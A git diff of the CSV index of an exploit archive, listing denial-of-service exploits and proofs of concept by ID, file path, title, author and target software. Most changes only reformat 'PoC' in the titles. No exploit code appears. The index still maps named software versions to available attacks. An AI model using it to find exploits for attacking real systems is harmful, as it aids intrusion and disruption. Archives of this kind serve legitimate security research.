diff --git a/files.csv b/files.csv index 87c68808a..81dc588c0 100644 --- a/files.csv +++ b/files.csv @@ -1,6 +1,6 @@ id,file,description,date,author,platform,type,port 9,platforms/windows/dos/9.c,"Apache 2.x - Memory Leak Exploit",2003-04-09,"Matthew Murphy",windows,dos,0 -37060,platforms/windows/dos/37060.html,"Microsoft Internet Explorer 11 - Crash PoC (1)",2015-05-19,Garage4Hackers,windows,dos,0 +37060,platforms/windows/dos/37060.html,"Microsoft Internet Explorer 11 - Crash (PoC) (1)",2015-05-19,Garage4Hackers,windows,dos,0 11,platforms/linux/dos/11.c,"Apache 2.0.44 (Linux) - Remote Denial of Service",2003-04-11,"Daniel Nystram",linux,dos,0 13,platforms/windows/dos/13.c,"Chindi Server 1.0 - Denial of Service",2003-04-18,"Luca Ercoli",windows,dos,0 17,platforms/windows/dos/17.pl,"Xeneo Web Server 2.2.9.0 - Denial of Service",2003-04-22,"Tom Ferris",windows,dos,0 @@ -10,13 +10,13 @@ id,file,description,date,author,platform,type,port 60,platforms/hardware/dos/60.c,"Cisco IOS - 'cisco-bug-44020.c' IPv4 Packet Denial of Service",2003-07-21,"Martin Kluge",hardware,dos,0 61,platforms/windows/dos/61.c,"Microsoft Windows Server 2000 - RPC DCOM Interface Denial of Service",2003-07-21,Flashsky,windows,dos,0 62,platforms/hardware/dos/62.sh,"Cisco IOS - (using hping) Remote Denial of Service",2003-07-22,zerash,hardware,dos,0 -65,platforms/windows/dos/65.c,"Microsoft Windows SQL Server - Denial of Service Remote Exploit (MS03-031)",2003-07-25,refdom,windows,dos,0 +65,platforms/windows/dos/65.c,"Microsoft Windows SQL Server - Remote Denial of Service (MS03-031)",2003-07-25,refdom,windows,dos,0 68,platforms/linux/dos/68.c,"Linux Kernel 2.4.20 - 'decode_fh' Denial of Service",2003-07-29,"Jared Stanbrough",linux,dos,0 73,platforms/windows/dos/73.c,"Trillian 0.74 - Remote Denial of Service",2003-08-01,l0bstah,windows,dos,0 82,platforms/windows/dos/82.c,"Piolet Client 1.05 - Remote Denial of Service",2003-08-20,"Luca Ercoli",windows,dos,0 94,platforms/multiple/dos/94.c,"MyServer 0.4.3 - Denial of Service",2003-09-08,badpack3t,multiple,dos,80 111,platforms/windows/dos/111.c,"Microsoft Windows Messenger Service - Denial of Service (MS03-043)",2003-10-18,LSD-PLaNET,windows,dos,0 -113,platforms/windows/dos/113.pl,"Microsoft Exchange Server 2000 - XEXCH50 Heap Overflow PoC (MS03-046)",2003-10-22,"H D Moore",windows,dos,0 +113,platforms/windows/dos/113.pl,"Microsoft Exchange Server 2000 - XEXCH50 Heap Overflow (PoC) (MS03-046)",2003-10-22,"H D Moore",windows,dos,0 115,platforms/linux/dos/115.c,"WU-FTPD 2.6.2 - 'wuftpd-freezer.c' Remote Denial of Service",2003-10-31,"Angelo Rosiello",linux,dos,0 146,platforms/multiple/dos/146.c,"OpenSSL ASN.1 < 0.9.6j / 0.9.7b - Brute Forcer for Parsing Bugs",2003-10-09,"Bram Matthys",multiple,dos,0 147,platforms/windows/dos/147.c,"Need for Speed 2 - Remote Client Buffer Overflow",2004-01-23,"Luigi Auriemma",windows,dos,0 @@ -254,7 +254,7 @@ id,file,description,date,author,platform,type,port 1336,platforms/windows/dos/1336.cpp,"FileZilla Server Terminal 0.9.4d - Buffer Overflow (PoC)",2005-11-21,"Inge Henriksen",windows,dos,0 1338,platforms/hardware/dos/1338.pl,"Cisco PIX - Spoofed TCP SYN Packets Remote Denial of Service",2005-11-23,"Janis Vizulis",hardware,dos,0 1339,platforms/windows/dos/1339.c,"freeFTPd 1.0.10 - 'PORT' Denial of Service",2005-11-24,"Stefan Lochbihler",windows,dos,0 -1341,platforms/windows/dos/1341.c,"Microsoft Windows - MSDTC Service Remote Memory Modification PoC (MS05-051)",2005-11-27,darkeagle,windows,dos,0 +1341,platforms/windows/dos/1341.c,"Microsoft Windows - MSDTC Service Remote Memory Modification (PoC) (MS05-051)",2005-11-27,darkeagle,windows,dos,0 1343,platforms/windows/dos/1343.c,"Microsoft Windows Metafile - 'gdi32.dll' Denial of Service (MS05-053)",2005-11-29,"Winny Thomas",windows,dos,0 1345,platforms/php/dos/1345.php,"Xaraya 1.0.0 RC4 - create() Denial of Service",2005-11-29,rgod,php,dos,0 1346,platforms/windows/dos/1346.c,"Microsoft Windows Metafile - 'mtNoObjects' Denial of Service (MS05-053)",2005-11-30,"Winny Thomas",windows,dos,0 @@ -283,7 +283,7 @@ id,file,description,date,author,platform,type,port 1488,platforms/windows/dos/1488.txt,"Microsoft HTML Help Workshop - '.hhp' Denial of Service",2006-02-10,darkeagle,windows,dos,0 1489,platforms/multiple/dos/1489.pl,"Invision Power Board 2.1.4 - (Register Users) Denial of Service",2006-02-10,SkOd,multiple,dos,0 1496,platforms/hardware/dos/1496.c,"D-Link (Wireless Access Point) - (Fragmented UDP) Denial of Service",2006-02-14,"Aaron Portnoy",hardware,dos,0 -1500,platforms/windows/dos/1500.cpp,"Microsoft Windows Media Player 7.1 < 10 - BMP Heap Overflow PoC (MS06-005) (1)",2006-02-15,ATmaCA,windows,dos,0 +1500,platforms/windows/dos/1500.cpp,"Microsoft Windows Media Player 7.1 < 10 - BMP Heap Overflow (PoC) (MS06-005) (1)",2006-02-15,ATmaCA,windows,dos,0 1517,platforms/php/dos/1517.c,"PunBB 2.0.10 - (Register Multiple Users) Denial of Service",2006-02-20,K4P0,php,dos,0 1531,platforms/windows/dos/1531.pl,"ArGoSoft FTP Server 1.4.3.5 - Remote Buffer Overflow (PoC)",2006-02-25,"Jerome Athias",windows,dos,0 1535,platforms/windows/dos/1535.c,"CrossFire 1.8.0 - (oldsocketmode) Remote Buffer Overflow (PoC)",2006-02-27,"Luigi Auriemma",windows,dos,0 @@ -376,11 +376,11 @@ id,file,description,date,author,platform,type,port 2176,platforms/hardware/dos/2176.html,"Nokia Symbian 60 3rd Edition - Browser Denial of Service Crash",2006-08-13,Qode,hardware,dos,0 2179,platforms/multiple/dos/2179.c,"Opera 9 - IRC Client Remote Denial of Service",2006-08-13,Preddy,multiple,dos,0 2180,platforms/multiple/dos/2180.py,"Opera 9 IRC Client - Remote Denial of Service (Python)",2006-08-13,Preddy,multiple,dos,0 -2194,platforms/windows/dos/2194.pl,"Microsoft Windows - '.png' File IHDR Block Denial of Service PoC (1)",2006-08-16,Preddy,windows,dos,0 +2194,platforms/windows/dos/2194.pl,"Microsoft Windows - '.png' IHDR Block Denial of Service (PoC) (1)",2006-08-16,Preddy,windows,dos,0 2195,platforms/windows/dos/2195.html,"VMware 5.5.1 - COM Object Arbitrary Partition Table Delete Exploit",2006-08-16,nop,windows,dos,0 -2204,platforms/windows/dos/2204.c,"Microsoft Windows - '.png' File IHDR Block Denial of Service PoC (3)",2006-08-17,Preddy,windows,dos,0 +2204,platforms/windows/dos/2204.c,"Microsoft Windows - '.png' IHDR Block Denial of Service (PoC) (3)",2006-08-17,Preddy,windows,dos,0 2208,platforms/windows/dos/2208.html,"Macromedia Flash 9 - (IE Plugin) Remote Denial of Service Crash",2006-08-18,Mr.Niega,windows,dos,0 -2210,platforms/windows/dos/2210.c,"Microsoft Windows - '.png' File IHDR Block Denial of Service PoC (2)",2006-08-18,vegas78,windows,dos,0 +2210,platforms/windows/dos/2210.c,"Microsoft Windows - '.png' IHDR Block Denial of Service (PoC) (2)",2006-08-18,vegas78,windows,dos,0 2237,platforms/multiple/dos/2237.sh,"Apache (mod_rewrite) < 1.3.37 / 2.0.59 / 2.2.3 - Remote Overflow (PoC)",2006-08-21,"Jacobo Avariento",multiple,dos,0 2238,platforms/windows/dos/2238.html,"Microsoft Internet Explorer - Multiple COM Object Color Property Denial of Service",2006-08-21,nop,windows,dos,0 2244,platforms/multiple/dos/2244.pl,"Mozilla Firefox 1.5.0.6 - (FTP Request) Remote Denial of Service",2006-08-22,"Tomas Kempinsky",multiple,dos,0 @@ -407,7 +407,7 @@ id,file,description,date,author,platform,type,port 2672,platforms/windows/dos/2672.py,"Microsoft Windows - NAT Helper Components 'ipnathlp.dll' Remote Denial of Service",2006-10-28,h07,windows,dos,0 2682,platforms/windows/dos/2682.pl,"Microsoft Windows - NAT Helper Components Remote Denial of Service (Perl)",2006-10-30,x82,windows,dos,0 2695,platforms/multiple/dos/2695.html,"Mozilla Firefox 1.5.0.7/2.0 - (createRange) Remote Denial of Service",2006-10-31,"Gotfault Security",multiple,dos,0 -2700,platforms/hardware/dos/2700.rb,"Apple Airport - 802.11 Probe Response Kernel Memory Corruption PoC (Metasploit)",2006-11-01,"H D Moore",hardware,dos,0 +2700,platforms/hardware/dos/2700.rb,"Apple Airport - 802.11 Probe Response Kernel Memory Corruption (PoC) (Metasploit)",2006-11-01,"H D Moore",hardware,dos,0 2708,platforms/windows/dos/2708.c,"NullSoft Winamp 5.3 - (Ultravox-Max-Msg) Heap Overflow Denial of Service (PoC)",2006-11-03,cocoruder,windows,dos,0 2715,platforms/windows/dos/2715.pl,"XM Easy Personal FTP Server 5.2.1 - Remote Denial of Service",2006-11-04,boecke,windows,dos,0 2716,platforms/windows/dos/2716.pl,"Essentia Web Server 2.15 - GET Request Remote Denial of Service",2006-11-04,CorryL,windows,dos,0 @@ -425,7 +425,7 @@ id,file,description,date,author,platform,type,port 2879,platforms/windows/dos/2879.py,"Microsoft Windows - spoolss GetPrinterData() Remote Denial of Service",2006-12-01,h07,windows,dos,0 2892,platforms/linux/dos/2892.py,"F-Prot AntiVirus 4.6.6 - (ACE) Denial of Service",2006-12-04,"Evgeny Legerov",linux,dos,0 2893,platforms/linux/dos/2893.py,"F-Prot AntiVirus 4.6.6 - (CHM) Heap Overflow (PoC)",2006-12-04,"Evgeny Legerov",linux,dos,0 -2900,platforms/windows/dos/2900.py,"Microsoft Windows - DNS Resolution Remote Denial of Service PoC (MS06-041)",2006-12-09,"Winny Thomas",windows,dos,0 +2900,platforms/windows/dos/2900.py,"Microsoft Windows - DNS Resolution Remote Denial of Service (PoC) (MS06-041)",2006-12-09,"Winny Thomas",windows,dos,0 2901,platforms/windows/dos/2901.php,"FileZilla FTP Server 0.9.20b/0.9.21 - (STOR) Denial of Service",2006-12-09,rgod,windows,dos,0 2910,platforms/multiple/dos/2910.txt,"Sophos AntiVirus - '.CHM' File Heap Overflow (PoC)",2006-12-10,"Damian Put",multiple,dos,0 2911,platforms/multiple/dos/2911.txt,"Sophos AntiVirus - '.CHM' Chunk Name Length Memory Corruption (PoC)",2006-12-10,"Damian Put",multiple,dos,0 @@ -484,7 +484,7 @@ id,file,description,date,author,platform,type,port 3167,platforms/osx/dos/3167.c,"Apple Mac OSX 10.4.x Kernel - shared_region_map_file_np() Memory Corruption",2007-01-21,"Adriano Lima",osx,dos,0 3182,platforms/windows/dos/3182.py,"Sami HTTP Server 2.0.1 - HTTP 404 Object not found Denial of Service",2007-01-23,shinnai,windows,dos,0 3190,platforms/windows/dos/3190.py,"Microsoft Windows - Explorer (.AVI) Unspecified Denial of Service",2007-01-24,shinnai,windows,dos,0 -3193,platforms/windows/dos/3193.py,"Microsoft Excel - Malformed Palette Record Denial of Service PoC (MS07-002)",2007-01-25,LifeAsaGeek,windows,dos,0 +3193,platforms/windows/dos/3193.py,"Microsoft Excel - Malformed Palette Record Denial of Service (PoC) (MS07-002)",2007-01-25,LifeAsaGeek,windows,dos,0 3200,platforms/osx/dos/3200.rb,"Apple CFNetwork - HTTP Response Denial of Service (Ruby)",2007-01-25,MoAB,osx,dos,0 3204,platforms/windows/dos/3204.c,"Citrix Metaframe Presentation Server Print Provider - Buffer Overflow (PoC)",2007-01-26,"Andres Tarasco",windows,dos,0 3223,platforms/cgi/dos/3223.pl,"CVSTrac 2.0.0 - Defacement Denial of Service",2007-01-29,"Ralf S. Engelschall",cgi,dos,0 @@ -636,7 +636,7 @@ id,file,description,date,author,platform,type,port 4359,platforms/multiple/dos/4359.txt,"Apple QuickTime < 7.2 - SMIL Remote Integer Overflow",2007-09-03,"David Vaartjes",multiple,dos,0 4369,platforms/windows/dos/4369.html,"Microsoft Visual FoxPro 6.0 - FPOLE.OCX 6.0.8450.0 Remote (PoC)",2007-09-06,shinnai,windows,dos,0 4373,platforms/windows/dos/4373.html,"EDraw Office Viewer Component 5.2 - ActiveX Remote Buffer Overflow (PoC)",2007-09-07,shinnai,windows,dos,0 -4375,platforms/windows/dos/4375.txt,"BaoFeng2 - 'mps.dll' ActiveX Multiple Remote Buffer Overflow PoCs",2007-09-08,ZhenHan.Liu,windows,dos,0 +4375,platforms/windows/dos/4375.txt,"BaoFeng2 - 'mps.dll' ActiveX Multiple Remote Buffer Overflow (PoCs)",2007-09-08,ZhenHan.Liu,windows,dos,0 4379,platforms/windows/dos/4379.html,"Microsoft SQL Server - Distributed Management Objects 'sqldmo.dll' Buffer Overflow",2007-09-08,rgod,windows,dos,0 4403,platforms/windows/dos/4403.py,"JetCast Server 2.0.0.4308 - Remote Denial of Service",2007-09-13,vCore,windows,dos,0 4409,platforms/windows/dos/4409.html,"HP ActiveX - 'hpqutil.dll' ListFiles Remote Heap Overflow (PoC)",2007-09-14,GOODFELLAS,windows,dos,0 @@ -712,7 +712,7 @@ id,file,description,date,author,platform,type,port 5306,platforms/multiple/dos/5306.txt,"Snircd 1.3.4 - 'send_user_mode' Denial of Service",2008-03-24,"Chris Porter",multiple,dos,0 5307,platforms/linux/dos/5307.pl,"MPlayer 1.0 rc2 - 'sdpplin_parse()' Array Indexing Buffer Overflow (PoC)",2008-03-25,"Guido Landi",linux,dos,0 5316,platforms/windows/dos/5316.py,"PacketTrap Networks pt360 2.0.39 TFTPD - Remote Denial of Service",2008-03-26,muts,windows,dos,0 -5321,platforms/windows/dos/5321.txt,"Visual Basic - 'vbe6.dll' Local Stack Overflow PoC / Denial of Service",2008-03-30,Marsu,windows,dos,0 +5321,platforms/windows/dos/5321.txt,"Visual Basic - 'vbe6.dll' Local Stack Overflow (PoC) / Denial of Service",2008-03-30,Marsu,windows,dos,0 5327,platforms/windows/dos/5327.txt,"Microsoft Windows - Explorer Unspecified .doc File Denial of Service",2008-03-31,"Iron Team",windows,dos,0 5341,platforms/windows/dos/5341.pl,"Noticeware Email Server 4.6.1.0 - Denial of Service",2008-04-01,Ray,windows,dos,0 5343,platforms/windows/dos/5343.py,"Mcafee EPO 4.0 - FrameworkService.exe Remote Denial of Service",2008-04-02,muts,windows,dos,0 @@ -734,7 +734,7 @@ id,file,description,date,author,platform,type,port 5679,platforms/multiple/dos/5679.php,"PHP 5.2.6 - 'sleep()' Local Memory Exhaust Exploit",2008-05-27,Gogulas,multiple,dos,0 5682,platforms/windows/dos/5682.html,"CA Internet Security Suite 2008 - 'SaveToFile()' File Corruption (PoC)",2008-05-28,Nine:Situations:Group,windows,dos,0 5687,platforms/windows/dos/5687.txt,"Adobe Acrobat Reader 8.1.2 - Malformed PDF Remote Denial of Service (PoC)",2008-05-29,securfrog,windows,dos,0 -5709,platforms/windows/dos/5709.pl,"freeSSHd 1.2.1 - Remote Stack Overflow PoC Authenticated",2008-05-31,securfrog,windows,dos,0 +5709,platforms/windows/dos/5709.pl,"freeSSHd 1.2.1 - Authenticated Remote Stack Overflow (PoC)",2008-05-31,securfrog,windows,dos,0 5712,platforms/multiple/dos/5712.pl,"Samba 3.0.29 (client) - 'receive_smb_raw()' Buffer Overflow (PoC)",2008-06-01,"Guido Landi",multiple,dos,0 5718,platforms/windows/dos/5718.pl,"Alt-N SecurityGateway 1.0.1 - 'Username' Remote Buffer Overflow (PoC)",2008-06-01,securfrog,windows,dos,0 5727,platforms/windows/dos/5727.pl,"Alt-N MDaemon 9.6.5 - Multiple Remote Buffer Overflow (PoC)",2008-06-02,securfrog,windows,dos,0 @@ -808,7 +808,7 @@ id,file,description,date,author,platform,type,port 6614,platforms/windows/dos/6614.html,"Mozilla Firefox 3.0.3 - User Interface Null Pointer Dereference Crash",2008-09-28,"Aditya K Sood",windows,dos,0 6615,platforms/windows/dos/6615.html,"Opera 9.52 - Window Object Suppressing Remote Denial of Service",2008-09-28,"Aditya K Sood",windows,dos,0 6616,platforms/windows/dos/6616.txt,"Microsoft Windows Explorer - '.zip' Denial of Service",2008-09-28,"fl0 fl0w",windows,dos,0 -6619,platforms/windows/dos/6619.html,"Microsoft Internet Explorer GDI+ - PoC (MS08-052)",2008-09-28,"John Smith",windows,dos,0 +6619,platforms/windows/dos/6619.html,"Microsoft Internet Explorer GDI+ - (PoC) (MS08-052)",2008-09-28,"John Smith",windows,dos,0 6622,platforms/multiple/dos/6622.txt,"Wireshark 1.0.x - Malformed .ncf packet capture Local Denial of Service",2008-09-29,Shinnok,multiple,dos,0 6647,platforms/windows/dos/6647.c,"ESET SysInspector 1.1.1.0 - 'esiadrv.sys' (PoC)",2008-10-01,"NT Internals",windows,dos,0 6651,platforms/windows/dos/6651.pl,"vxFtpSrv 2.0.3 - 'CWD' Remote Buffer Overflow (PoC)",2008-10-02,"Julien Bedard",windows,dos,0 @@ -821,13 +821,13 @@ id,file,description,date,author,platform,type,port 6673,platforms/windows/dos/6673.txt,"FastStone Image Viewer 3.6 - (malformed bmp image) Crash",2008-10-05,suN8Hclf,windows,dos,0 6689,platforms/linux/dos/6689.txt,"Konqueror 3.5.9 - (font color) Remote Crash",2008-10-06,"Jeremy Brown",linux,dos,0 6704,platforms/linux/dos/6704.txt,"Konqueror 3.5.9 - (color/bgcolor) Multiple Remote Crash Vulnerabilities",2008-10-08,"Jeremy Brown",linux,dos,0 -6716,platforms/windows/dos/6716.pl,"Microsoft Windows - GDI+ PoC (MS08-052) (2)",2008-10-09,"John Smith",windows,dos,0 +6716,platforms/windows/dos/6716.pl,"Microsoft Windows - GDI+ (PoC) (MS08-052) (2)",2008-10-09,"John Smith",windows,dos,0 6717,platforms/windows/dos/6717.py,"WinFTP Server 2.3.0 - (PASV mode) Remote Denial of Service",2008-10-09,dmnt,windows,dos,0 6718,platforms/linux/dos/6718.html,"Konqueror 3.5.9 - (load) Remote Crash",2008-10-10,"Jeremy Brown",linux,dos,0 6719,platforms/windows/dos/6719.py,"Noticeware E-mail Server 5.1.2.2 - (POP3) Unauthenticated Denial of Service",2008-10-10,rAWjAW,windows,dos,0 6726,platforms/hardware/dos/6726.txt,"Nokia Mini Map Browser - (array sort) Silent Crash",2008-10-10,ikki,hardware,dos,0 -6732,platforms/windows/dos/6732.txt,"Microsoft Windows - InternalOpenColorProfile Heap Overflow PoC (MS08-046)",2008-10-12,Ac!dDrop,windows,dos,0 -6738,platforms/windows/dos/6738.py,"GuildFTPd 0.999.8.11/0.999.14 - Heap Corruption PoC/Denial of Service",2008-10-12,dmnt,windows,dos,0 +6732,platforms/windows/dos/6732.txt,"Microsoft Windows - InternalOpenColorProfile Heap Overflow (PoC) (MS08-046)",2008-10-12,Ac!dDrop,windows,dos,0 +6738,platforms/windows/dos/6738.py,"GuildFTPd 0.999.8.11/0.999.14 - Heap Corruption (PoC) / Denial of Service",2008-10-12,dmnt,windows,dos,0 6741,platforms/windows/dos/6741.py,"XM Easy Personal FTP Server 5.6.0 - Remote Denial of Service",2008-10-13,shinnai,windows,dos,0 6742,platforms/windows/dos/6742.py,"RaidenFTPd 2.4 build 3620 - Remote Denial of Service",2008-10-13,dmnt,windows,dos,0 6752,platforms/windows/dos/6752.pl,"Eserv 3.x - FTP Server (ABOR) Remote Stack Overflow (PoC)",2008-10-14,LiquidWorm,windows,dos,0 @@ -895,7 +895,7 @@ id,file,description,date,author,platform,type,port 7647,platforms/multiple/dos/7647.txt,"VMware 2.5.1 - 'VMware-authd' Remote Denial of Service",2009-01-02,"laurent gaffié",multiple,dos,0 7649,platforms/windows/dos/7649.pl,"Destiny Media Player 1.61 - '.m3u' Local Buffer Overflow (PoC)",2009-01-02,"aBo MoHaMeD",windows,dos,0 7652,platforms/windows/dos/7652.pl,"Destiny Media Player 1.61 - '.lst' Local Buffer Overflow (PoC)",2009-01-03,Encrypt3d.M!nd,windows,dos,0 -7673,platforms/multiple/dos/7673.html,"Apple Safari - 'ARGUMENTS' Array Integer Overflow PoC (New Heap Spray)",2009-01-05,Skylined,multiple,dos,0 +7673,platforms/multiple/dos/7673.html,"Apple Safari - 'ARGUMENTS' Array Integer Overflow (PoC) (New Heap Spray)",2009-01-05,Skylined,multiple,dos,0 7685,platforms/multiple/dos/7685.pl,"SeaMonkey 1.1.14 - Denial of Service",2009-01-06,StAkeR,multiple,dos,0 7693,platforms/windows/dos/7693.pl,"Perception LiteServe 2.0.1 - (user) Remote Buffer Overflow (PoC)",2009-01-07,Houssamix,windows,dos,0 7694,platforms/windows/dos/7694.py,"Audacity 1.6.2 - '.aup' Remote Off-by-One Crash",2009-01-07,Stack,windows,dos,0 @@ -947,7 +947,7 @@ id,file,description,date,author,platform,type,port 8084,platforms/windows/dos/8084.pl,"Got All Media 7.0.0.3 - Remote Denial of Service",2009-02-20,LiquidWorm,windows,dos,0 8090,platforms/windows/dos/8090.txt,"Multiple PDF Readers - JBIG2 Local Buffer Overflow (PoC)",2009-02-23,webDEViL,windows,dos,0 8091,platforms/multiple/dos/8091.html,"Mozilla Firefox 3.0.6 - (BODY onload) Remote Crash",2009-02-23,Skylined,multiple,dos,0 -8099,platforms/windows/dos/8099.pl,"Adobe Acrobat Reader - JBIG2 Local Buffer Overflow PoC (2)",2009-02-23,"Guido Landi",windows,dos,0 +8099,platforms/windows/dos/8099.pl,"Adobe Acrobat Reader - JBIG2 Local Buffer Overflow (PoC) (2)",2009-02-23,"Guido Landi",windows,dos,0 8102,platforms/windows/dos/8102.txt,"Counter Strike Source ManiAdminPlugin 1.x - Remote Buffer Overflow (PoC)",2009-02-24,M4rt1n,windows,dos,0 8106,platforms/hardware/dos/8106.txt,"Netgear WGR614v9 Wireless Router - Denial of Service",2009-02-25,staticrez,hardware,dos,0 8125,platforms/hardware/dos/8125.rb,"HTC Touch - vCard over IP Denial of Service",2009-03-02,"Mobile Security Lab",hardware,dos,0 @@ -956,7 +956,7 @@ id,file,description,date,author,platform,type,port 8148,platforms/multiple/dos/8148.pl,"Yaws < 1.80 - (Multiple headers) Remote Denial of Service",2009-03-03,"Praveen Darshanam",multiple,dos,0 8156,platforms/windows/dos/8156.txt,"Easy Web Password 1.2 - Local Heap Memory Consumption (PoC)",2009-03-04,Stack,windows,dos,0 8163,platforms/bsd/dos/8163.txt,"Multiple Vendors libc:fts_*() - Local Denial of Service",2009-03-05,SecurityReason,bsd,dos,0 -8180,platforms/windows/dos/8180.c,"eZip Wizard 3.0 - Local Stack Buffer Overflow PoC (SEH)",2009-03-09,"fl0 fl0w",windows,dos,0 +8180,platforms/windows/dos/8180.c,"eZip Wizard 3.0 - Local Stack Buffer Overflow (PoC) (SEH)",2009-03-09,"fl0 fl0w",windows,dos,0 8187,platforms/hardware/dos/8187.sh,"Addonics NAS Adapter - Authenticated Denial of Service",2009-03-09,h00die,hardware,dos,0 8190,platforms/windows/dos/8190.txt,"IBM Director 5.20.3su2 CIM Server - Remote Denial of Service",2009-03-10,"Bernhard Mueller",windows,dos,0 8205,platforms/linux/dos/8205.pl,"JDKChat 1.5 - Remote Integer Overflow (PoC)",2009-03-12,n3tpr0b3,linux,dos,0 @@ -965,7 +965,7 @@ id,file,description,date,author,platform,type,port 8219,platforms/multiple/dos/8219.html,"Mozilla Firefox 3.0.7 - OnbeforeUnLoad DesignMode Dereference Crash",2009-03-16,Skylined,multiple,dos,0 8224,platforms/windows/dos/8224.pl,"WinAsm Studio 5.1.5.0 - Local Heap Overflow (PoC)",2009-03-16,Stack,windows,dos,0 8225,platforms/windows/dos/8225.py,"Gretech GOM Encoder 1.0.0.11 - '.Subtitle' Buffer Overflow (PoC)",2009-03-16,Encrypt3d.M!nd,windows,dos,0 -8232,platforms/windows/dos/8232.py,"Chasys Media Player 1.1 - '.pls' Local Buffer Overflow PoC (SEH)",2009-03-18,zAx,windows,dos,0 +8232,platforms/windows/dos/8232.py,"Chasys Media Player 1.1 - '.pls' Local Buffer Overflow (PoC) (SEH)",2009-03-18,zAx,windows,dos,0 8241,platforms/multiple/dos/8241.txt,"ModSecurity < 2.5.9 - Remote Denial of Service",2009-03-19,"Juan Galiana Lara",multiple,dos,0 8245,platforms/multiple/dos/8245.c,"SW-HTTPD Server 0.x - Remote Denial of Service",2009-03-19,"Jonathan Salwan",multiple,dos,0 8259,platforms/freebsd/dos/8259.c,"FreeBSD 7.x - (Dumping Environment) Local Kernel Panic Exploit",2009-03-23,kokanin,freebsd,dos,0 @@ -975,7 +975,7 @@ id,file,description,date,author,platform,type,port 8264,platforms/osx/dos/8264.c,"Apple Mac OSX xnu 1228.3.13 - 'Profil' Kernel Memory Leak/Denial of Service (PoC)",2009-03-23,mu-b,osx,dos,0 8265,platforms/osx/dos/8265.c,"Apple Mac OSX xnu 1228.x - 'vfssysctl' Local Kernel Denial of Service (PoC)",2009-03-23,mu-b,osx,dos,0 8281,platforms/windows/dos/8281.txt,"Microsoft GdiPlus - EMF GpFont.SetData Integer Overflow (PoC)",2009-03-24,"Black Security",windows,dos,0 -8285,platforms/multiple/dos/8285.txt,"Mozilla Firefox XSL - Parsing Remote Memory Corruption PoC (1)",2009-03-25,"Guido Landi",multiple,dos,0 +8285,platforms/multiple/dos/8285.txt,"Mozilla Firefox XSL - Parsing Remote Memory Corruption (PoC) (1)",2009-03-25,"Guido Landi",multiple,dos,0 8294,platforms/windows/dos/8294.c,"XM Easy Personal FTP Server 5.7.0 - 'NLST' Denial of Service",2009-03-27,"Jonathan Salwan",windows,dos,0 8300,platforms/windows/dos/8300.py,"PowerCHM 5.7 - '.hhp' Stack Overflow (PoC)",2009-03-27,Encrypt3d.M!nd,windows,dos,0 8306,platforms/windows/dos/8306.txt,"Mozilla Firefox 3.0.x - (XML Parser) Memory Corruption / Denial of Service (PoC)",2009-03-30,"Wojciech Pawlikowski",windows,dos,0 @@ -991,7 +991,7 @@ id,file,description,date,author,platform,type,port 8344,platforms/multiple/dos/8344.py,"IBM DB2 < 9.5 pack 3a - Connect Denial of Service",2009-04-03,"Dennis Yurichev",multiple,dos,0 8345,platforms/multiple/dos/8345.py,"IBM DB2 < 9.5 pack 3a - Data Stream Denial of Service",2009-04-03,"Dennis Yurichev",multiple,dos,0 8352,platforms/windows/dos/8352.txt,"Amaya 11.1 - XHTML Parser Remote Buffer Overflow (PoC)",2009-04-06,cicatriz,windows,dos,0 -8356,platforms/windows/dos/8356.txt,"Mozilla Firefox XSL - Parsing Remote Memory Corruption PoC (2)",2009-04-06,DATA_SNIPER,windows,dos,0 +8356,platforms/windows/dos/8356.txt,"Mozilla Firefox XSL - Parsing Remote Memory Corruption (PoC) (2)",2009-04-06,DATA_SNIPER,windows,dos,0 8358,platforms/windows/dos/8358.pl,"UltraISO 9.3.3.2685 - '.ui' Off-by-One / Buffer Overflow (PoC)",2009-04-06,Stack,windows,dos,0 8360,platforms/windows/dos/8360.pl,"Unsniff Network Analyzer 1.0 - (usnf) Local Heap Overflow (PoC)",2009-04-06,LiquidWorm,windows,dos,0 8370,platforms/windows/dos/8370.pl,"GOM Player 2.1.16.6134 - Subtitle Local Buffer Overflow (PoC)",2009-04-08,"Bui Quang Minh",windows,dos,0 @@ -1017,7 +1017,7 @@ id,file,description,date,author,platform,type,port 8466,platforms/windows/dos/8466.pl,"Microsoft GDI Plugin - '.png' Infinite Loop Denial of Service (PoC)",2009-04-17,"Code Audit Labs",windows,dos,0 8467,platforms/windows/dos/8467.pl,"Microsoft Media Player - 'quartz.dll .wav' Multiple Remote Denial of Service Vulnerabilities",2009-04-17,"Code Audit Labs",windows,dos,0 8469,platforms/linux/dos/8469.c,"XRDP 0.4.1 - Unauthenticated Remote Buffer Overflow (PoC)",2009-04-17,"joe walko",linux,dos,0 -8479,platforms/windows/dos/8479.html,"Microsoft Internet Explorer - EMBED Memory Corruption PoC (MS09-014)",2009-04-20,Skylined,windows,dos,0 +8479,platforms/windows/dos/8479.html,"Microsoft Internet Explorer - EMBED Memory Corruption (PoC) (MS09-014)",2009-04-20,Skylined,windows,dos,0 8484,platforms/windows/dos/8484.pl,"1by1 1.67 - '.m3u' Local Stack Overflow (PoC)",2009-04-20,GoLd_M,windows,dos,0 8485,platforms/windows/dos/8485.pl,"Groovy Media Player 1.1.0 - '.m3u' Local Stack Overflow (PoC)",2009-04-20,GoLd_M,windows,dos,0 8489,platforms/windows/dos/8489.pl,"CoolPlayer Portable 2.19.1 - '.m3u' Local Stack Overflow (PoC)",2009-04-20,GoLd_M,windows,dos,0 @@ -1052,7 +1052,7 @@ id,file,description,date,author,platform,type,port 8650,platforms/windows/dos/8650.c,"TYPSoft FTP Server 1.11 - 'ABORT' Remote Denial of Service",2009-05-11,"Jonathan Salwan",windows,dos,0 8665,platforms/windows/dos/8665.html,"Java SE Runtime Environment JRE 6 Update 13 - Multiple Vulnerabilities",2009-05-13,shinnai,windows,dos,0 8669,platforms/multiple/dos/8669.c,"IPsec-Tools < 0.7.2 (racoon frag-isakmp) - Multiple Remote Denial of Service (PoC)",2009-05-13,mu-b,multiple,dos,0 -8677,platforms/windows/dos/8677.txt,"DigiMode Maya 1.0.2 - '.m3u' / '.m3l' Buffer Overflow PoCs",2009-05-14,SirGod,windows,dos,0 +8677,platforms/windows/dos/8677.txt,"DigiMode Maya 1.0.2 - '.m3u' / '.m3l' Buffer Overflow (PoCs)",2009-05-14,SirGod,windows,dos,0 8695,platforms/multiple/dos/8695.txt,"Eggdrop/Windrop 1.6.19 - ctcpbuf Remote Crash",2009-05-15,"Thomas Sader",multiple,dos,0 8712,platforms/windows/dos/8712.txt,"httpdx 0.5b - Multiple Remote Denial of Service Vulnerabilities",2009-05-18,sico2819,windows,dos,0 8720,platforms/multiple/dos/8720.c,"OpenSSL 0.9.8k / 